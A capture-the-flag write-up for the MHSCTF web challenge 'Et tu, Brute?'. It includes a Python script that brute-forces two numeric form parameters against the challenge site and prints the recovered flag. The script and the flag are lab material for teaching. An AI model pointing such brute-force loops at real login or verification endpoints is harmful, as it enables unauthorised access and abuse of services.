Contents

MHSCTF - Web - Et tu, Brute?


Web - Et tu, Brute? - writeup

Description

I want to see how many people are actually my friends and aren’t just pretending! Only my best friends get flags. You can check our friendship status at this website. mhsctf-ettubrute.0xmmalik.repl.co (you may need to wait for the site to wake up)

Writeup

So I went ahead and wrote a simple brute force program in python:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/env python3

import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry

# the url we are going to post to 
url='https://mhsctf-ettubrute.0xmmalik.repl.co/status.php'

# the two parameters we need to bruteforce
# they are integers between 1 and 100
number=0
number2=0

# define the 'failed' response
failed="Sorry, you're clearly not my friend if you don't know my favorite and second favorite numbers!"

session = requests.Session()
retry = Retry(connect=3, backoff_factor=0.5)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)

# iterate through the possible combinations using two nested for loops
for number in range(100):
	for number2 in range(100):
		postobj = {'number': number, 'number2': number2}
		result = session.post(url, data = postobj)
		if (result.text != failed): 
			print('got the flag: ')
			print(result.text)

After some minutes of running my bruteforce utility i got the following response:

1
2
got the flag: 
Wow! You must really be my friend if you know my favorite and second favorite numbers! Here's a flag for you: flag{pur3_s7r3ngth}

So the flag is

1
flag{pur3_s7r3ngth}